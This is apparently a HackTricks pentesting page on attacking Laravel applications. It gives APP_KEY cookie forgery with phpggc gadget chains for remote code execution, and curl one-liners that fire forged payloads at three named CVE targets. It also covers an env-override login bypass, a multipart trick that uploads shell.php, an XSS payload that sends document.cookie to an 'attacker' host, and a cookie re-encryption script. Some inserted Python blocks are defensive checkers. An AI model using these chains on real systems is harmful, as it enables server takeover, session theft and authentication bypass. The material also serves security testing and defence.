# Laravel

> [!TIP]
> Learn & practice AWS Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
> Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)\
> Learn & practice Azure Hacking: [**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)
>
> <details>
>
> <summary>Support HackTricks</summary>
>
> - Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow us** on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>

## Laravel SQLInjection

Read about this here: https://stitcher.io/blog/unsafe-sql-functions-in-laravel


## APP_KEY & Encryption: internals (Laravel >=5.6)

Laravel uses AES-256-CBC (or GCM) with HMAC integrity under the hood (Illuminate\Encryption\Encrypter). The raw ciphertext that is finally sent to the client is the Base64 of a JSON object like:

```json
{
"iv"   : "Base64(random 16-byte IV)",
"value": "Base64(ciphertext)",
"mac"  : "HMAC_SHA256(iv||value, APP_KEY)",
"tag"  : ""                 // only used for AEAD ciphers (GCM)
}
```

encrypt($value, $serialize=true) will serialize() the plaintext by default, while decrypt($payload, $unserialize=true) automatically unserialize()s the decrypted value. Therefore any attacker who knows the 32-byte secret APP_KEY can craft an encrypted, serialized PHP object and obtain RCE through magic methods (__wakeup, __destruct, …).
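To make the envelope format and the MAC rule concrete from the defender's side, here is an added Python example (not code from Laravel or from this page) that parses a token, checks the IV length and verifies the HMAC in constant time without decrypting anything, which is exactly the check an application can run before it ever reaches `unserialize()`. The key, IV and ciphertext bytes are constructed for the demo; `wrap_ciphertext` only builds the JSON envelope around bytes that are assumed to be already encrypted, and `tamper_value` models a ciphertext edit that keeps the old MAC.

```python
import base64
import binascii
import hashlib
import hmac
import json


def parse_app_key(app_key: str) -> bytes:
    """Decode a Laravel APP_KEY (with or without the 'base64:' prefix) and check its size."""
    if app_key.startswith("base64:"):
        app_key = app_key[len("base64:"):]
    key = base64.b64decode(app_key, validate=True)
    # AES-128-CBC needs 16 bytes, AES-256-CBC/GCM 32 bytes; anything else is a misconfigured key.
    if len(key) not in (16, 32):
        raise ValueError(f"key is {len(key)} bytes, expected 16 or 32")
    return key


def verify_payload(app_key: str, token: str) -> str:
    """Return 'ok' when token is a well-formed Laravel envelope with a valid MAC, else the reason."""
    try:
        key = parse_app_key(app_key)
    except (ValueError, binascii.Error) as exc:
        return f"bad key: {exc}"
    try:
        envelope = json.loads(base64.b64decode(token, validate=True))
    except (ValueError, binascii.Error):
        return "not a Laravel payload"
    if not isinstance(envelope, dict):
        return "not a Laravel payload"
    for field in ("iv", "value", "mac"):
        if not isinstance(envelope.get(field), str):
            return f"missing field: {field}"
    try:
        iv_raw = base64.b64decode(envelope["iv"], validate=True)
    except binascii.Error:
        return "iv is not base64"
    if len(iv_raw) != 16:
        return f"iv is {len(iv_raw)} bytes, expected 16"
    # The MAC is HMAC-SHA256 over the *base64 text* of iv and value, keyed with the raw APP_KEY.
    expected = hmac.new(key, (envelope["iv"] + envelope["value"]).encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, envelope["mac"]):
        return "mac mismatch"
    return "ok"


def wrap_ciphertext(key: bytes, iv: bytes, ciphertext: bytes) -> str:
    """Build the envelope around already-encrypted bytes (fixture builder, no AES involved)."""
    iv_b64 = base64.b64encode(iv).decode()
    value_b64 = base64.b64encode(ciphertext).decode()
    mac = hmac.new(key, (iv_b64 + value_b64).encode(), hashlib.sha256).hexdigest()
    envelope = {"iv": iv_b64, "value": value_b64, "mac": mac, "tag": ""}
    return base64.b64encode(json.dumps(envelope).encode()).decode()


def tamper_value(token: str) -> str:
    """Flip one ciphertext byte while keeping the old MAC; the verifier must reject this."""
    envelope = json.loads(base64.b64decode(token))
    raw = bytearray(base64.b64decode(envelope["value"]))
    raw[0] ^= 0x01
    envelope["value"] = base64.b64encode(bytes(raw)).decode()
    return base64.b64encode(json.dumps(envelope).encode()).decode()


# Constructed demo keys and ciphertext; not a real APP_KEY or a captured cookie.
DEMO_KEY = bytes(range(32))
DEMO_APP_KEY = "base64:" + base64.b64encode(DEMO_KEY).decode()
OTHER_APP_KEY = "base64:" + base64.b64encode(bytes(32)).decode()
DEMO_TOKEN = wrap_ciphertext(DEMO_KEY, b"\x01" * 16, b"\xaa" * 32)


if __name__ == "__main__":
    print(verify_payload(DEMO_APP_KEY, DEMO_TOKEN))                # ok
    print(verify_payload(DEMO_APP_KEY, tamper_value(DEMO_TOKEN)))  # mac mismatch
    print(verify_payload(OTHER_APP_KEY, DEMO_TOKEN))               # mac mismatch
```

The point the verifier makes explicit: the MAC binds the ciphertext to whoever holds APP_KEY and nothing else, so a leaked or default key turns this integrity check into a formality; that is why key uniqueness and rotation matter more than the cipher mode here.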

Minimal PoC (framework ≥9.x):

```php
use Illuminate\Support\Facades\Crypt;

$chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
$evil  = Crypt::encrypt($chain);            // JSON->Base64 cipher ready to paste
```

Inject the generated string into any vulnerable decrypt() sink (route param, cookie, session, …).


## laravel-crypto-killer 🧨

laravel-crypto-killer automates the whole process and adds a handy bruteforce mode:

```bash
# Encrypt a phpggc chain with a known APP_KEY
laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"

# Decrypt a captured cookie / token
laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>

# Try a word-list of keys against a token (offline)
laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt
```

The script transparently supports both CBC and GCM payloads and regenerates the HMAC/tag field.


## Real-world vulnerable examples

| Project | Vulnerable sink | Gadget chain |
|---|---|---|
| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}` → `decrypt($hash)` | Laravel/RCE13 |
| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` cookie when `Passport::withCookieSerialization()` is enabled | Laravel/RCE9 |
| Crater (CVE-2024-55556) | `laravel_session` cookie with `SESSION_DRIVER=cookie` | Laravel/RCE15 |

The exploitation flow is always:

1. Obtain or brute-force the 32-byte APP_KEY.
2. Build a gadget chain with PHPGGC (e.g. Laravel/RCE13, Laravel/RCE9 or Laravel/RCE15).
3. Encrypt the serialized gadget with laravel_crypto_killer.py and the recovered APP_KEY.
4. Deliver the ciphertext to the vulnerable decrypt() sink (route parameter, cookie, session …) to trigger RCE.

Below are short one-liners showing the full attack path for each real-world CVE mentioned above:

```bash
# Invoice Ninja ≤5 – /route/{hash}
php8.2 phpggc Laravel/RCE13 system id -b -f | \
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - | \
xargs -I% curl "https://victim/route/%"

# Snipe-IT ≤6 – XSRF-TOKEN cookie
php7.4 phpggc Laravel/RCE9 system id -b | \
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - > xsrf.txt
curl -H "Cookie: XSRF-TOKEN=$(cat xsrf.txt)" https://victim/login

# Crater – cookie-based session
php8.2 phpggc Laravel/RCE15 system id -b > payload.bin
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v payload.bin --session_cookie=<orig_hash> > forged.txt
curl -H "Cookie: laravel_session=<orig>; <cookie_name>=$(cat forged.txt)" https://victim/login
```

Because every fresh Laravel response sets at least one encrypted cookie (XSRF-TOKEN and usually laravel_session), public internet scanners (Shodan, Censys, …) leak millions of ciphertexts that can be attacked offline.

Key findings of the research published by Synacktiv (2024-2025):

- July 2024 dataset » 580 k tokens, 3.99 % of keys cracked (≈23 k)
- May 2025 dataset » 625 k tokens, 3.56 % of keys cracked
- 1 000 servers still vulnerable to the legacy CVE-2018-15133 because their tokens directly contain serialized data.
- Massive key reuse – the top-10 APP_KEYs are hard-coded defaults shipped with commercial Laravel templates (UltimatePOS, Invoice Ninja, XPanel, …).

The private Go tool nounours pushes AES-CBC/GCM bruteforce throughput to ~1.5 billion tries/s, reducing the cracking of the whole dataset to <2 minutes.

## CVE-2024-52301 – HTTP argv/env override → auth bypass

When PHP runs with register_argc_argv=On (the default on many distros), PHP exposes an argv array for HTTP requests, derived from the query string. Recent Laravel versions parsed these "CLI-like" arguments and honoured --env=<value> at runtime. This makes it possible to switch the framework environment for the current HTTP request simply by appending to any URL:

- Quick check:
  - Visit https://target/?--env=local (or any string) and look for environment-dependent changes (debug banners, footers, verbose errors). If the string is reflected, the override works.
- Impact example (business logic trusting a special env):
  - If the app has branches like `if (app()->environment('preprod')) { /* bypass auth */ }`, you can authenticate without valid creds by sending the login POST to `POST /login?--env=preprod`.
- Notes:
  - Works per request, no persistence.
  - Requires register_argc_argv=On and a vulnerable Laravel version that reads argv for HTTP requests.
  - Handy primitive to trigger more verbose errors in "debug" envs or to unlock environment-gated code paths.
- Mitigations:
  - Disable register_argc_argv for PHP-FPM/Apache.
  - Update Laravel so it ignores argv for HTTP requests, and remove any trust assumptions tied to app()->environment() from production routes.

Minimal exploitation flow (Burp):

```http
POST /login?--env=preprod HTTP/1.1
Host: target
Content-Type: application/x-www-form-urlencoded
...
email=a@b.c&password=whatever&remember=0xdf
```
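To turn the behaviour above into something a defender can act on, here is an added Python example (not from the page, the advisory or the public PoC) that scans web-server access-log lines for query-string tokens PHP would expose as argv options (such as `--env=...`, including a percent-encoded `--`) and parses a php.ini excerpt for the `register_argc_argv` setting. The log lines and ini text are constructed; splitting the query on `+` as well as `&` follows PHP's CGI argv handling, and treating a missing directive as On matches PHP's compiled-in default (php.ini-production turns it Off).

```python
import re
from urllib.parse import unquote, urlsplit

# A query-string token that starts with "--" is what a vulnerable Laravel version read as a CLI option.
OPTION_TOKEN = re.compile(r"^--[A-Za-z][\w-]*(=.*)?$")
# Apache/nginx combined log format: client ident user [time] "METHOD target PROTO" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def argv_tokens(target: str) -> list:
    """Return the query-string tokens of a request target that look like CLI options."""
    query = urlsplit(target).query
    tokens = []
    # PHP builds argv from the query string split on '+'; '&' is the ordinary separator.
    for raw in re.split(r"[&+]", query):
        token = unquote(raw)  # decode %2D%2D style evasion before matching
        if OPTION_TOKEN.match(token):
            tokens.append(token)
    return tokens


def scan_access_log(lines) -> list:
    """Flag requests carrying argv-style options; one dict per suspicious request."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        tokens = argv_tokens(m.group("target"))
        if tokens:
            hits.append({"ip": m.group("ip"), "method": m.group("method"),
                         "target": m.group("target"), "status": m.group("status"),
                         "tokens": tokens})
    return hits


def register_argc_argv_enabled(php_ini: str) -> bool:
    """Read register_argc_argv from php.ini text; missing directive means PHP's default (On)."""
    setting = None
    for line in php_ini.splitlines():
        line = line.split(";", 1)[0].strip()  # drop comments
        if "=" not in line:
            continue
        name, value = (part.strip() for part in line.split("=", 1))
        if name.lower() == "register_argc_argv":
            setting = value.strip("\"'").lower()  # last occurrence wins, as in PHP
    if setting is None:
        return True
    return setting in ("1", "on", "true", "yes")


# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2025:10:00:01 +0000] "POST /login?--env=preprod HTTP/1.1" 302 0',
    '203.0.113.5 - - [10/Mar/2025:10:00:02 +0000] "GET /?--env=local HTTP/1.1" 200 5123',
    '198.51.100.7 - - [10/Mar/2025:10:00:03 +0000] "GET /products?page=2&sort=--desc HTTP/1.1" 200 812',
    '198.51.100.7 - - [10/Mar/2025:10:00:04 +0000] "GET /search?q=--env%3Dlocal HTTP/1.1" 200 911',
    '203.0.113.9 - - [10/Mar/2025:10:00:05 +0000] "GET /login?a=1+--env=staging HTTP/1.1" 200 4401',
]
SAMPLE_INI = "; constructed php.ini excerpt\nregister_argc_argv = On\nexpose_php = Off\n"


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
    print("register_argc_argv enabled:", register_argc_argv_enabled(SAMPLE_INI))
```

Only parameter *names* beginning with `--` are flagged, so `sort=--desc` and `q=--env%3Dlocal` stay quiet: a value containing dashes is normal traffic, while a bare `--env=` token is what the framework actually consumed.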

## CVE-2025-27515 – Wildcard file validation bypass (files.*)

Laravel 10.0–10.48.28, 11.0.0–11.44.0 and 12.0.0–12.1.0 can let crafted multipart requests completely bypass any rule attached to files.* / images.*. The parser that expands wildcard keys can be confused by attacker-controlled placeholders (e.g. pre-populating __asterisk__ segments), so the framework hydrates UploadedFile objects without ever running image, mimes, dimensions, max, etc. Once a malicious blob reaches Storage::putFile* you can pivot to any of the file-upload primitives already covered on HackTricks (web shells, log poisoning, signed job deserialization, …).

### Hunting for the pattern

- Static: `rg -n "files\\.\*" -g"*.php" app/` or look for FormRequest classes whose rules() return arrays referencing files.*.
- Dynamic: hook Illuminate\Validation\Validator::validate() via Xdebug or Laravel Telescope in pre-production to log every request that hits the leaking rule.
- Middleware/route review: endpoints that collect multiple files (avatar uploads, document portals, drag-n-drop widgets) frequently trust files.*.

### Practical exploitation flow

1. Record a legitimate upload and replay it in Burp Repeater.
2. Duplicate the same part but change the field name so that it already contains placeholder tokens (e.g. files[0][__asterisk__payload]) or nests another array (files[0][alt][0]). On vulnerable builds the second part is never validated but still becomes an UploadedFile entry.
3. Point the injected file at a PHP payload (shell.php, .phar, polyglot) and force the application to store it on a web-visible disk (usually public/ once php artisan storage:link is enabled).

```bash
curl -sk https://target/upload \
-F 'files[0]=@ok.png;type=image/png' \
-F 'files[0][__asterisk__payload]=@shell.php;type=text/plain' \
-F 'description=lorem'
```

Keep fuzzing key names (files.__dot__0, files[0][0], files[0][uuid] …) until you find one that gets past the validator but is still written to disk; patched versions reject these crafted attribute names immediately.
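As an added example (not from the page, the advisory or Laravel's own code base), the following Python pre-filter shows the kind of check an upload endpoint can apply to multipart field names before they reach the validator: it rejects names that carry the validator's internal placeholder tokens, names with malformed bracket syntax, and names whose shape is not covered by a declared file rule such as `files.*` (so `files[0][alt][0]` is refused under a two-level rule). The field names and rules are constructed and mirror the curl request and fuzz candidates above; upgrading the framework remains the real fix, this only illustrates why the crafted names are distinguishable.

```python
import re
from typing import Optional

# Internal tokens Laravel's validator substitutes while expanding wildcard rules; a client
# has no legitimate reason to send them in a field name.
PLACEHOLDER_TOKENS = ("__asterisk__", "__dot__")
BRACKET_SEGMENT = re.compile(r"\[([^\[\]]*)\]")
FIELD_NAME = re.compile(r"^([^\[\]]+)((?:\[[^\[\]]*\])*)$")


def field_segments(name: str) -> Optional[list]:
    """Split a PHP-style form field name into key segments: 'files[0][alt][1]' -> ['files','0','alt','1'].
    Returns None when the bracket syntax is malformed."""
    m = FIELD_NAME.match(name)
    if not m:
        return None
    head, rest = m.groups()
    return [head] + BRACKET_SEGMENT.findall(rest)


def rule_matches(segments: list, rule: str) -> bool:
    """Does the field shape match a dotted rule key such as 'files.*'?
    '*' matches exactly one segment; an empty segment ('files[]') is PHP's auto-index."""
    parts = rule.split(".")
    if len(parts) != len(segments):
        return False
    return all(p == "*" or p == s for p, s in zip(parts, segments))


def field_problem(name: str, rules: list) -> Optional[str]:
    """Reason to reject a file field name, or None when it is acceptable."""
    if any(tok in name for tok in PLACEHOLDER_TOKENS):
        return "contains validator placeholder token"
    segments = field_segments(name)
    if segments is None:
        return "malformed field name"
    if not any(rule_matches(segments, r) for r in rules):
        return "shape not covered by any file rule"
    return None


def check_upload_fields(file_fields: list, rules: list):
    """Partition uploaded-file field names into accepted names and rejected names with reasons."""
    accepted, rejected = [], {}
    for name in file_fields:
        problem = field_problem(name, rules)
        if problem is None:
            accepted.append(name)
        else:
            rejected[name] = problem
    return accepted, rejected


# Constructed field names: the legitimate part, the crafted part from the curl request, and fuzz candidates.
SAMPLE_FIELDS = ["files[0]", "files[]", "files[0][__asterisk__payload]", "files[0][alt][0]",
                 "files.__dot__0", "files[0][0]", "files[0][uuid]", "files[0"]
SAMPLE_RULES = ["files.*"]


if __name__ == "__main__":
    ok, bad = check_upload_fields(SAMPLE_FIELDS, SAMPLE_RULES)
    print("accepted:", ok)
    for name, why in bad.items():
        print(f"rejected {name!r}: {why}")
```

The shape check is deliberately strict: a rule written as `files.*` promises exactly one level of files, so anything deeper is treated as a validation gap rather than silently hydrated, which is the failure mode the CVE describes.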


## Ecosystem vulns worth chaining (2025)

### CVE-2025-47275 – Auth0-PHP CookieStore tag brute-force (affects auth0/laravel-auth0)

If the project uses Auth0 login with the default CookieStore backend and auth0/auth0-php < 8.14.0, the GCM tag on the auth0 session cookie is short enough for offline brute-force. Capture the cookie, modify the JSON payload (e.g. set "sub":"auth0|admin" and app_metadata.roles), brute-force the tag, then replay it to obtain a valid session for the Laravel guard. Quick check: composer.lock shows auth0/auth0-php <8.14.0 and .env has AUTH0_SESSION_STORAGE=cookie.

### CVE-2025-48490 – lomkit/laravel-rest-api validation override

The lomkit/laravel-rest-api package before 2.13.0 merges per-action rules incorrectly: later definitions overwrite earlier ones for the same attribute, letting crafted fields skip validation (e.g. re-injecting filter rules during an update action), which leads to mass assignment or unvalidated SQL-like filters. Practical checks:

- composer.lock lists lomkit/laravel-rest-api <2.13.0.
- `/_rest/users?filters[0][column]=password&filters[0][operator]==` is accepted instead of rejected, showing that filter validation is broken.

## Laravel Tricks

### Debugging mode

If Laravel is in debugging mode you will be able to access code and sensitive data.
For example http://127.0.0.1:8000/profiles:

This is usually required to exploit other Laravel RCE CVEs.

### CVE-2024-13918 / CVE-2024-13919 – reflected XSS in Whoops debug pages

- Affected: Laravel 11.9.0–11.35.1 with APP_DEBUG=true (globally or forced through misconfigured env overrides such as CVE-2024-52301).
- Primitive: every unhandled exception rendered by Whoops echoes parts of the request/route without HTML encoding, so injecting <img src> / <script> into the route or a request parameter yields a stored-on-response XSS before authentication.
- Impact: stealing XSRF-TOKEN, leaking stack traces with secrets, opening a pivot by having the browser hit _ignition/execute-solution inside victims' sessions, or chaining with passwordless dashboards that rely on cookies.

Minimal PoC:

```php
// blade/web.php (attacker-controlled param reflected)
Route::get('/boom/{id}', function ($id) {
abort(500);
});
```

```bash
curl -sk "https://target/boom/%3Cscript%3Efetch('//attacker/x?c='+document.cookie)%3C/script%3E"
```

Even when debug mode is normally off, forcing an error through background jobs or queue workers and probing the _ignition/health-check endpoint often reveals staging hosts that still expose this chain.

### Fingerprinting & exposed dev endpoints

Quick checks to identify a Laravel stack and dangerous dev tooling exposed in production:

- /_ignition/health-check → Ignition present (debug tool used by CVE-2021-3129). If reachable without authentication, the app may be in debug mode or misconfigured.
- /_debugbar → Laravel Debugbar assets; often indicates debug mode.
- /telescope → Laravel Telescope (dev monitor). If public, expect broad information disclosure and possibly actions.
- /horizon → Queue dashboard; version disclosure and sometimes CSRF-protected actions.
- X-Powered-By, the XSRF-TOKEN and laravel_session cookies, and Blade error pages also help with fingerprinting.

```bash
# Nuclei quick probe
nuclei -nt -u https://target -tags laravel -rl 30
# Manual spot checks
for p in _ignition/health-check _debugbar telescope horizon; do curl -sk https://target/$p | head -n1; done
```

### .env

Laravel stores the APP_KEY it uses to encrypt cookies and other credentials inside a file called .env that may be reachable through path traversal under: /../.env

Laravel will also show this information on the debug page (shown when Laravel hits an error and debug is enabled).

Using the secret APP_KEY of Laravel you can decrypt and re-encrypt cookies:

<details>

<summary>Decrypt/encrypt cookies helper (Python)</summary>

```python
import os
import json
import hashlib
import hmac
import base64
from Crypto.Cipher import AES
from phpserialize import loads, dumps

# https://gist.github.com/bluetechy/5580fab27510906711a2775f3c4f5ce3

def mcrypt_decrypt(value, iv):
    # AES-CBC with the raw APP_KEY; the key length selects AES-128/256
    global key
    AES.key_size = [len(key)]
    crypt_object = AES.new(key=key, mode=AES.MODE_CBC, IV=iv)
    return crypt_object.decrypt(value)

def mcrypt_encrypt(value, iv):
    global key
    AES.key_size = [len(key)]
    crypt_object = AES.new(key=key, mode=AES.MODE_CBC, IV=iv)
    return crypt_object.encrypt(value)

def decrypt(bstring):
    global key
    dic = json.loads(base64.b64decode(bstring).decode())
    mac = dic['mac']
    value = bytes(dic['value'], 'utf-8')
    iv = bytes(dic['iv'], 'utf-8')
    # the MAC is computed over the base64 text of iv and value
    if mac == hmac.new(key, iv+value, hashlib.sha256).hexdigest():
        return mcrypt_decrypt(base64.b64decode(value), base64.b64decode(iv))
        #return loads(mcrypt_decrypt(base64.b64decode(value), base64.b64decode(iv))).decode()
    return ''

def encrypt(string):
    global key
    iv = os.urandom(16)
    #string = dumps(string)
    padding = 16 - len(string) % 16            # PKCS#7 padding
    string += bytes(chr(padding) * padding, 'utf-8')
    value = base64.b64encode(mcrypt_encrypt(string, iv))
    iv = base64.b64encode(iv)
    mac = hmac.new(key, iv+value, hashlib.sha256).hexdigest()
    dic = {'iv': iv.decode(), 'value': value.decode(), 'mac': mac}
    return base64.b64encode(bytes(json.dumps(dic), 'utf-8'))

app_key = 'HyfSfw6tOF92gKtVaLaLO4053ArgEf7Ze0ndz0v487k='
key = base64.b64decode(app_key)
# the captured cookie value is truncated on the original page
decrypt('eyJpdiI6ImJ3TzlNRjV6bXFyVjJTdWZhK3JRZ1E9PSIsInZhbHVlIjoiQ3kxVDIwWkRFOE1sXC9iUUxjQ2IxSGx1V3MwS1BBXC9KUUVrTklReit0V2k3TkMxWXZJUE02cFZEeERLQU1PV1gxVForYkd1dWNhY3lpb2Nmb0J6YlNZR28rVmk1QUVJS3YwS3doTXVHSlxcL1JGY0t6YzhaaGNHR1duSktIdjF1elxcLzV4a3dUOElZVzMw...')
#b'{"data":"a:6:{s:6:\"_token\";s:40:\"vYzY0IdalD2ZC7v9yopWlnnYnCB2NkCXPbzfQ3MV\";s:8:\"username\";s:8:\"guestc32\";s:5:\"order\";s:2:\"id\";s:9:\"direction\";s:4:\"desc\";s:6:\"_flash\";a:2:{s:3:\"old\";a:0:{}s:3:\"new\";a:0:{}}s:9:\"_previous\";a:1:{s:3:\"url\";s:38:\"http:\/\/206.189.25.23:31031\/api\/configs\";}}","expires":1605140631}\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e'
encrypt(rb'{"data":"a:6:{s:6:\"_token\";s:40:\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2SwepVOiUw\";s:8:\"username\";s:8:\"guest60e\";s:5:\"order\";s:8:\"lolololo\";s:9:\"direction\";s:4:\"desc\";s:6:\"_flash\";a:2:{s:3:\"old\";a:0:{}s:3:\"new\";a:0:{}}s:9:\"_previous\";a:1:{s:3:\"url\";s:38:\"http:\/\/206.189.25.23:31031\/api\/configs\";}}","expires":1605141157}')
```

</details>

### Laravel Deserialization RCE

Affected versions: 5.5.40 and 5.6.x through 5.6.29 ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/))

Here you can find information about the deserialization vulnerability: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/)

You can try to exploit it using [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\
Or you can also exploit it with metasploit: `use unix/http/laravel_token_unserialize_exec`

### CVE-2021-3129

Another deserialization: [https://github.com/ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)



## References
* [Laravel: APP_KEY leakage analysis (EN)](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
* [Laravel : analyse de fuite d’APP_KEY (FR)](https://www.synacktiv.com/publications/laravel-analyse-de-fuite-dappkey.html)
* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
* [PHPGGC – PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
* [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
* [CVE-2024-52301 advisory – Laravel argv env detection](https://github.com/advisories/GHSA-gv7v-rgg6-548h)
* [CVE-2024-52301 PoC – register_argc_argv HTTP argv → --env override](https://github.com/Nyamort/CVE-2024-52301)
* [0xdf – HTB Environment (CVE-2024-52301 env override → auth bypass)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
* [GHSA-78fx-h6xr-vch4 – Laravel wildcard file validation bypass (CVE-2025-27515)](https://github.com/laravel/framework/security/advisories/GHSA-78fx-h6xr-vch4)
* [SBA Research – CVE-2024-13919 reflected XSS in debug-mode error page](http://www.openwall.com/lists/oss-security/2025/03/10/4)
* [CVE-2025-47275 – Auth0-PHP CookieStore tag brute-force (laravel-auth0)](https://www.wiz.io/vulnerability-database/cve/cve-2025-47275)
* [CVE-2025-48490 – lomkit/laravel-rest-api validation override](https://advisories.gitlab.com/pkg/composer/lomkit/laravel-rest-api/CVE-2025-48490/)

